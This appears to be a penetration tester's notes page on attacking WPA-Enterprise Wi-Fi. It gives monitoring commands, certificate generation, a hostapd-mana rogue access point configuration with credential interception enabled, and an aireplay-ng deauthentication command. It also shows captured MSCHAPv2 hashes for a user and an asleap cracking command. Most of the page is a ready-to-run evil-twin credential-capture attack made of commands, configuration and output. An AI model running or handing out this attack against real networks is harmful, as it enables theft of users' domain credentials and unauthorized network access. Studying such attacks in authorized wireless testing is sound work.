WPA-Enterprise

WPA Enterprise enables user authentication against a central database. WPA Enterprise uses Extensible Authentication Protocol (EAP).

Monitor:

airodump-ng --band abg wlan0 # no channel
airodump-ng --channel 6 wlan0 #  with channel

Create Certs

openssl x509 -in CERT_FILENAME -noout -enddate 
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt

sudo apt install freeradius

certs stored in "/etc/freeradius/3.0/certs"

cd /etc/freeradius/3.0/certs
make

Create certs:

Mkdir Tools/wireless/Certs 
cd Tools/wireless/Certs
openssl genrsa -out server.key 2048
openssl req -new -sha256 -key server.key -out csr.csr
openssl req -x509 -sha256 -days 365 -key server.key -in csr.csr -out server.pem
ln -s server.pem ca.pem
openssl dhparam 2048 > dhparam.pem

Create configuration:

# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g

# --------------------
# WPA configuration
# --------------------
wpa=2                                       # use WPA2 version
wpa_key_mgmt=WPA-EAP                        # use external authentication server
wpa_pairwise=TKIP CCMP                      # pairwise encryption to use

# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1                                 # requires 802.1x authentication server
eapol_key_index_workaround=0                # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1                                # enable integrated EAP server instead of RADIUS
eap_user_file=fakenet.eap_user              # filename containing information of users

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem 
private_key=/root/certs/server.key          # private key for the server certificate
private_key_passwd=                         # password used to encrypt the private key (empty here)
dh_file=/root/certs/dhparam.pem             # file path to DH/DSA parameters file (in PEM format)

# -----------------------------
# mana specific configuration
# -----------------------------
mana_wpe=1                                  # enable WPE mode to intercept various EAP credentials
mana_eapsuccess=1                           # return EAP success to the clients, and have them connect

Create user EAP file:

*               PEAP,TTLS,TLS,MD5,GTC
"t"             TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP  "1234test"  [2]

Deauth:

aireplay-ng --deauth 50 -a D2:E9:6A:D3:B3:50 -c 02:00:00:00:03:00 --ignore-negative-one wlan0

Capture:

When a victim attempts to authenticate to our AP, the login attempt is captured.

...
wlan0: STA 00:2b:bb:b0:42:9e IEEE 802.11: authenticated
wlan0: STA 00:2b:bb:b0:42:9e IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 00:2b:bb:b0:42:9e
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: cosmo
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: cosmo
MANA EAP EAP-MSCHAPV2 ASLEAP user=cosmo | asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4
MANA EAP EAP-MSCHAPV2 JTR | cosmo:$NETNTLM$ceb69885c656590c$7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | cosmo::::7279f65aa49870f45822c89dcbdd73c1b89d377844caead4:ceb69885c656590c
...

Crack captured creds:

asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst

Basic info:

Authentication is done using a Remote Authentication Dial-In User Service (RADIUS)2 server. The client authenticates using a number of EAP frames, depending on the agreed upon authentication scheme, which are relayed by the AP to the RADIUS server. If authentication is successful, the result is then used as Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the passphrase is derived to generate the PMK.

It is common to use a username and password to authenticate, which could be tied to domain credentials.

GitHub - sensepost/hostapd-mana: SensePost's modified hostapd for wifi attacks.GitHub

PreviousWPA/ WPA-2/ WPA-3 NextPMKID

Last updated 3 years ago